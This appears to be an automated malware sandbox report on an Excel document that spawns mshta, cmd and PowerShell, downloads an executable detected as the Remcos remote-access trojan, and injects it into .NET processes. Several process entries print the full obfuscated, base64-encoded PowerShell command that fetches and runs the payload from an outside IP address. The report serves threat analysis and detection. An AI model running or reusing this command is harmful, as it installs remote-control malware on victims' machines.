                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LTl6vqjMXS0Se1ergAjxKhzwPfM0KPVYmfECZ8LPWfnYaYvfbbkLbAka8BggID1VkIU7D94GIIQ6ISCCqOj131%2Fxx8WgPhdUsMznifPS6v8myzyNrNiV9EXp"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8a92af1bfb7b8ce2-EWR
                alt-svc: h3=":443"; ma=86400
                Data Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                Behavior

                Click to jump to process

                System Behavior

                General

                Target ID:0
                Start time:03:29:33
                Start date:26/07/2024
                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                Wow64 process (32bit):false
                Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                Imagebase:0x13f240000
                File size:28'253'536 bytes
                MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:false

                General

                Target ID:4
                Start time:03:29:56
                Start date:26/07/2024
                Path:C:\Windows\System32\mshta.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\System32\mshta.exe -Embedding
                Imagebase:0x13fda0000
                File size:13'824 bytes
                MD5 hash:95828D670CFD3B16EE188168E083C3C5
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:5
                Start time:03:30:00
                Start date:26/07/2024
                Path:C:\Windows\System32\cmd.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\system32\cmd.exe" "/c POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1N0QXJULXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2luaXRpLmV4ZSI='+[CHAr]34+'))')))"
                Imagebase:0x4a820000
                File size:345'088 bytes
                MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:7
                Start time:03:30:00
                Start date:26/07/2024
                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):false
                Commandline:POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1N0QXJULXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2luaXRpLmV4ZSI='+[CHAr]34+'))')))"
                Imagebase:0x13fa90000
                File size:443'392 bytes
                MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:moderate
                Has exited:true

                General

                Target ID:8
                Start time:03:30:05
                Start date:26/07/2024
                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.cmdline"
                Imagebase:0x13f4d0000
                File size:2'758'280 bytes
                MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:moderate
                Has exited:true

                General

                Target ID:9
                Start time:03:30:05
                Start date:26/07/2024
                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC41B.tmp" "c:\Users\user\AppData\Local\Temp\ofvwqfjd\CSC42CCF8E8871B428699CAD148D9BC26FF.TMP"
                Imagebase:0x13fc30000
                File size:52'744 bytes
                MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:moderate
                Has exited:true

                General

                Target ID:11
                Start time:03:30:12
                Start date:26/07/2024
                Path:C:\Users\user\AppData\Roaming\winiti.exe
                Wow64 process (32bit):false
                Commandline:"C:\Users\user\AppData\Roaming\winiti.exe"
                Imagebase:0x13fdd0000
                File size:2'673'152 bytes
                MD5 hash:4FB3E6E7B8F9C12CD2D5E161F7B94760
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000B.00000002.451807346.0000000143D64000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000B.00000002.451807346.0000000143D64000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000B.00000002.451807346.0000000143D64000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                Reputation:low
                Has exited:true

                General

                Target ID:13
                Start time:03:30:13
                Start date:26/07/2024
                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                Wow64 process (32bit):true
                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
                Imagebase:0x1120000
                File size:41'112 bytes
                MD5 hash:AF862061889F5B9B956E9469DCDAE773
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.843116352.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                Reputation:moderate
                Has exited:false

                General

                Target ID:16
                Start time:03:30:20
                Start date:26/07/2024
                Path:C:\Windows\System32\mshta.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\System32\mshta.exe -Embedding
                Imagebase:0x13f540000
                File size:13'824 bytes
                MD5 hash:95828D670CFD3B16EE188168E083C3C5
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:17
                Start time:03:30:22
                Start date:26/07/2024
                Path:C:\Windows\System32\cmd.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\system32\cmd.exe" "/c POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1N0QXJULXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2luaXRpLmV4ZSI='+[CHAr]34+'))')))"
                Imagebase:0x4a8f0000
                File size:345'088 bytes
                MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                General

                Target ID:19
                Start time:03:30:22
                Start date:26/07/2024
                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):false
                Commandline:POWERsHElL.exe -ex BypAss -nop -w 1 -c DEViCEcReDEnTiaLdEPLOYmEnT ; IEx($(Iex('[SysTem.tEXt.ENCoDINg]'+[CHar]0x3A+[ChaR]58+'Utf8.GEtStRING([sYSTem.COnverT]'+[CHAr]0X3A+[CHAr]0x3A+'fRoMbASe64strinG('+[Char]34+'JDF6SUdOc3cgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtdFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYmVyZGVmaU5JVElvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICByTVh2eVRsVnFGLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBQQ2csdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRnZHWHFFdGdOLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIeCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeUFqVFB0cCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxeklHTnN3OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDI1MDdGL2NzcnNzLmV4ZSIsIiRFbnY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1N0QXJULXNMZUVwKDMpO3NUQVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW5WOkFQUERBVEFcd2luaXRpLmV4ZSI='+[CHAr]34+'))')))"
                Imagebase:0x13f350000
                File size:443'392 bytes
                MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:moderate
                Has exited:true

                General

                Target ID:20
                Start time:03:30:23
                Start date:26/07/2024
                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                Wow64 process (32bit):false
                Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ge3s1wmx\ge3s1wmx.cmdline"
                Imagebase:0x13fa10000
                File size:2'758'280 bytes
                MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:21
                Start time:03:30:24
                Start date:26/07/2024
                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC9F.tmp" "c:\Users\user\AppData\Local\Temp\ge3s1wmx\CSCB36078EA61014130AC1261969F8319D.TMP"
                Imagebase:0x13ff50000
                File size:52'744 bytes
                MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:true

                General

                Target ID:22
                Start time:03:30:28
                Start date:26/07/2024
                Path:C:\Users\user\AppData\Roaming\winiti.exe
                Wow64 process (32bit):false
                Commandline:"C:\Users\user\AppData\Roaming\winiti.exe"
                Imagebase:0x13f5f0000
                File size:2'673'152 bytes
                MD5 hash:4FB3E6E7B8F9C12CD2D5E161F7B94760
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000016.00000002.484524464.0000000143564000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000016.00000002.484524464.0000000143564000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000016.00000002.484524464.0000000143564000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                Has exited:true

                General

                Target ID:24
                Start time:03:30:28
                Start date:26/07/2024
                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                Wow64 process (32bit):
                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
                Imagebase:
                File size:261'688 bytes
                MD5 hash:C1BE61F3DE532751D6C1A35B851B0367
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Has exited:false

                General

                Target ID:25
                Start time:03:30:29
                Start date:26/07/2024
                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                Wow64 process (32bit):true
                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                Imagebase:0xcb0000
                File size:42'056 bytes
                MD5 hash:EFBCDD2A3EBEA841996AEF00417AA958
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000019.00000002.484511050.0000000000835000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                Has exited:true

                Disassembly

                Code Analysis

                Call Graph

                • Entrypoint
                • Decryption Function
                • Executed
                • Not Executed
                • Show Help
                callgraph 1 Error: Graph is empty

                Module: Sheet1

                Declaration
                LineContent
                1

                Attribute VB_Name = "Sheet1"

                2

                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                3

                Attribute VB_GlobalNameSpace = False

                4

                Attribute VB_Creatable = False

                5

                Attribute VB_PredeclaredId = True

                6

                Attribute VB_Exposed = True

                7

                Attribute VB_TemplateDerived = False

                8

                Attribute VB_Customizable = True

                Module: Sheet2

                Declaration
                LineContent
                1

                Attribute VB_Name = "Sheet2"

                2

                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                3

                Attribute VB_GlobalNameSpace = False

                4

                Attribute VB_Creatable = False

                5

                Attribute VB_PredeclaredId = True

                6

                Attribute VB_Exposed = True

                7

                Attribute VB_TemplateDerived = False

                8

                Attribute VB_Customizable = True

                Module: Sheet3

                Declaration
                LineContent
                1

                Attribute VB_Name = "Sheet3"

                2

                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                3

                Attribute VB_GlobalNameSpace = False

                4

                Attribute VB_Creatable = False

                5

                Attribute VB_PredeclaredId = True

                6

                Attribute VB_Exposed = True

                7

                Attribute VB_TemplateDerived = False

                8

                Attribute VB_Customizable = True

                Module: ThisWorkbook

                Declaration
                LineContent
                1

                Attribute VB_Name = "ThisWorkbook"

                2

                Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                3

                Attribute VB_GlobalNameSpace = False

                4

                Attribute VB_Creatable = False

                5

                Attribute VB_PredeclaredId = True

                6

                Attribute VB_Exposed = True

                7

                Attribute VB_TemplateDerived = False

                8

                Attribute VB_Customizable = True

                Reset < >

                  Executed Functions

                  Function 031B0FB9 Relevance: .0, Instructions: 5COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000003.422784556.00000000031B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 031B0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_3_31b0000_mshta.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                  • Instruction ID: 300254f3231993d467f09c06316af5edb6eaa4338009a099092a1367209101aa
                  • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                  • Instruction Fuzzy Hash:
                  Function 031B0FC1 Relevance: .0, Instructions: 5COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000004.00000003.422784556.00000000031B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 031B0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_3_31b0000_mshta.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                  • Instruction ID: 300254f3231993d467f09c06316af5edb6eaa4338009a099092a1367209101aa
                  • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                  • Instruction Fuzzy Hash:

                  Execution Graph

                  Execution Coverage:4.4%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:0%
                  Total number of Nodes:3
                  Total number of Limit Nodes:0
                  execution_graph 3993 7fe899f7ae1 3994 7fe899f7af1 URLDownloadToFileW 3993->3994 3996 7fe899f7c00 3994->3996

                  Executed Functions

                  Function 000007FE899F7018 Relevance: 1.6, APIs: 1, Instructions: 129filenetworkCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 105 7fe899f7018-7fe899f7ba1 109 7fe899f7ba3-7fe899f7ba8 105->109 110 7fe899f7bab-7fe899f7bb1 105->110 109->110 111 7fe899f7bb3-7fe899f7bb8 110->111 112 7fe899f7bbb-7fe899f7bfe URLDownloadToFileW 110->112 111->112 113 7fe899f7c00 112->113 114 7fe899f7c06-7fe899f7c23 112->114 113->114
                  APIs
                  Memory Dump Source
                  • Source File: 00000007.00000002.456821030.000007FE899F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_7fe899f0000_powershell.jbxd
                  Similarity
                  • API ID: DownloadFile
                  • String ID:
                  • API String ID: 1407266417-0
                  • Opcode ID: 57e0ea8ff209ae2a786c045d17250b47d06dcbfc7a8eb966348c235fdc8f49ec
                  • Instruction ID: 71c211064a91aa74a8ce5071b02526f3c7f91a7aba0f5081aaa2ac5c42da5f97
                  • Opcode Fuzzy Hash: 57e0ea8ff209ae2a786c045d17250b47d06dcbfc7a8eb966348c235fdc8f49ec
                  • Instruction Fuzzy Hash: 7A319031918A5C8FDB58EF5CD8857A9B7E1FB69321F00822ED04DD3651CB70A8058B81
                  Function 000007FE89AC0F4A Relevance: 5.3, Strings: 4, Instructions: 329COMMON
                  Download Yara Rule

                  Control-flow Graph

                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.456906198.000007FE89AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_7fe89ac0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: 8h<$8h<$8h<$8h<
                  • API String ID: 0-520171196
                  • Opcode ID: 49f98a1f7dce5f85b5316ee0b29c309ef960a693195c76156441a5023d5f5c58
                  • Instruction ID: 312008ed4d1e6f180959b670b8e349af900ba608e972ed9a065919a83deddd8a
                  • Opcode Fuzzy Hash: 49f98a1f7dce5f85b5316ee0b29c309ef960a693195c76156441a5023d5f5c58
                  • Instruction Fuzzy Hash: 24A1D220A0D7CA0FE747D73C58646657FE1EF47258B2900EBD58ECB2A3D9189C5AC361
                  Function 000007FE89AC566D Relevance: 1.7, Strings: 1, Instructions: 470COMMON
                  Download Yara Rule

                  Control-flow Graph

                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.456906198.000007FE89AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89AC0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_7fe89ac0000_powershell.jbxd
                  Similarity
                  • API ID:
                  • String ID: V
                  • API String ID: 0-1342839628
                  • Opcode ID: 3b88d5af0196fb849c45ae73b54ea9d02cc47a403d9a86902f1aa9840958b613
                  • Instruction ID: 7c257f1dc6a685d078b1f939684ef1405139d1db8acf94d9630697452c5171f3
                  • Opcode Fuzzy Hash: 3b88d5af0196fb849c45ae73b54ea9d02cc47a403d9a86902f1aa9840958b613
                  • Instruction Fuzzy Hash: 62D1273080E7C91FD357973898146B67FA4EF57264F0911EBE48DCB0A3D618AD1AC3A2
                  Function 000007FE899F7AE1 Relevance: 1.7, APIs: 1, Instructions: 159filenetworkCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 89 7fe899f7ae1-7fe899f7aef 90 7fe899f7af1 89->90 91 7fe899f7af2-7fe899f7b05 89->91 90->91 92 7fe899f7b07 91->92 93 7fe899f7b08-7fe899f7b19 91->93 92->93 94 7fe899f7b1b 93->94 95 7fe899f7b1c-7fe899f7ba1 93->95 94->95 99 7fe899f7ba3-7fe899f7ba8 95->99 100 7fe899f7bab-7fe899f7bb1 95->100 99->100 101 7fe899f7bb3-7fe899f7bb8 100->101 102 7fe899f7bbb-7fe899f7bfe URLDownloadToFileW 100->102 101->102 103 7fe899f7c00 102->103 104 7fe899f7c06-7fe899f7c23 102->104 103->104
                  APIs
                  Memory Dump Source
                  • Source File: 00000007.00000002.456821030.000007FE899F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_7fe899f0000_powershell.jbxd
                  Similarity
                  • API ID: DownloadFile
                  • String ID:
                  • API String ID: 1407266417-0
                  • Opcode ID: 10e21d837cd752a3c70500a2552246aa0a095d5d503b4ef883d3900a5d202389
                  • Instruction ID: 19eef98bea44a3bc7bf06c9a8cecebbf9ff3d9e28e4fd5846833f4787cdac5ee
                  • Opcode Fuzzy Hash: 10e21d837cd752a3c70500a2552246aa0a095d5d503b4ef883d3900a5d202389
                  • Instruction Fuzzy Hash: 4341F57091DB889FDB1ADB58D8447FABBF0FB56321F04426FD089D3562CB64A806C781
                  Function 000007FE89AC8549 Relevance: .7, Instructions: 707COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
